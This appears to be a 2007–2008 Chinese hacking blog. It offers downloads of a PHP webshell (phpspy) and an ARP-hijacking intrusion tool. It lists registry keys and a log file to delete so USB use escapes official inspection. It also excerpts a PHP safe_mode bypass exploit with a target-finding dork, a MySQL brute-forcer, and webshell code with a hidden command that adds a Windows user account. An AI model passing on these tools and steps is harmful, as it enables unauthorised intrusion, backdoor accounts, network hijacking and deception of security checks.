angel说做人要低调点的。
更多请关注本www.4ngel.net
Posted by amxku on 2008-01-07, 20:51 . 杂七杂八
angel说做人要低调点的。
更多请关注本www.4ngel.net
附件: phpspy_2008.rar [ 18.89 K, 下载次数:334 ]
Posted by amxku on 2007-12-26, 22:50 . 杂七杂八
有些特殊部门不允许使用移动存储设备,接受检查的时候可以用这招。
删除
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}下的所有项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB 下所有Vid开头的项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR 下的所有Disk&Ven开头的项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\UsbFlags 下所有项
c:\windows\setupapi.log 文件
Posted by amxku on 2007-12-23, 21:45 . 杂七杂八
//php 5.x COM functions safe_mode and disable_function bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//dork: intitle:phpinfo intext:"php version" +windows (thanks to rgod)
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
» 阅读全文
Posted by amxku on 2007-12-21, 19:11 . 杂七杂八
先看下angel忽悠我的部分源码
makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=net user angel angel /add');太牛X了,还好我先看了下代码,呼呼。估计是跟黑锅学的,这Y的不学好。前几天测试的那个版本还有部分问题,这个版本,基本上是已经很完美了,在MYSQL管理方面是大大的强。
makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');
</script>
AJAX也比较强,今天才发现他在安全技术中的重要作用了。隐蔽性超级好。什么这主动那主动防御的,在AJAX面前就什么都不是了。
Posted by amxku on 2007-12-01, 23:01 . 杂七杂八
小黑软件(Hacker Applications)发布啦!请记住我们:HackApp.com ,先来解释下我们域名的含义,HackApp = Hacker Applications。
我们的口号是---没有后门!
经过鬼仔 、7jdg 、amxku (排名不分先后,哈哈)的不懈努力,小黑软件(Hacker Applications)终于在今天上线了!
从10月中旬的开始策划到现在,已经半个多月了,中间可谓是经历了众多坎坷啊,先是从想域名开始,想了几天,域名想好了,程序也搭建好了,名字又想不起来,开始想名字,这一想就是10几天过去了。最后终于决定使用“小黑软件 ”这个名字。
我们的宗旨是收集、介绍我们认为比较好的、且对大家有用的网络安全相关软件给大家,另外大家有什么好的网络安全相关软件想共享的话,可以直接通过侧边栏的“联系我们”告诉我们。当然,必须是符合我们口号中的要求才可以,那就是“没有后门”!在我们这里,不会发盗号类的木马等。远控类的会发,但是只会发源码公布了的远控。只要是不能保证没有后门的软件,我们都不会发,宁缺毋滥。
我们也知道,这些说起来容易,但是做起来的话可能会比较难,因为一些好东西,大家都想留着自己用。我们只能尽我们最大的努力来做好,希望大家多多关注我们,多多给予我们帮助,谢谢!
7jdg:共同进步,共同学习,全力打造国内最大的安全软件资讯站,不求做的最好,只求能做的更好,希望大家关注我们,同时也希望大家能共同更新。
amxku:致力于网络安全软件的介绍,创造出最适合中国网络使用者阅读的新闻、评论、观点和专访等,使中国的网络使用者能够和世界其他地方一样,及时了解到当前网络安全相关软件的相关信息,从日新月异的科技信息中获得最大的信息价值。
鬼仔:哈哈,我就不说什么了,上面那些除了7jdg和amxku说的之外,都是我想说的了。
Posted by amxku on 2007-11-30, 22:08 . 杂七杂八
Posted by amxku on 2007-11-28, 16:53 . 杂七杂八
hijack最近接连被曝光,并且有的人乱涂改使用说明。
工具是红狼 CoolDiyer 的作品。现在我已征得他的同意,公布原版出来和前几天网上流传的版本不一样。大家自行测试。
MD5:d1ae00282af72ee1cf37f3a20bb677a7 ,解压密码: amxku
谁第一个下载,留下名字,有重重重奖!
附件: hijack.rar [ 224.27 K, 下载次数:1020 ]
Tags: 工具, 入侵, c.rufus s.t, arp
Posted by amxku on 2007-11-20, 10:56 . 杂七杂八
http://wordlist.sourceforge.net/
http://packetstorm.securify.com/Crackers/wordlists/words_spanish.g z
http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?sear chvalue=wordlist&type=archives&%5Bsearch%5D.x=17&%5Bsearch %5D.y=11
mysql
/* Simples Brutal Force para Mysql.
BruteForce in mysql
*/
» 阅读全文
Posted by amxku on 2007-11-20, 00:09 . 杂七杂八
Tags: 工具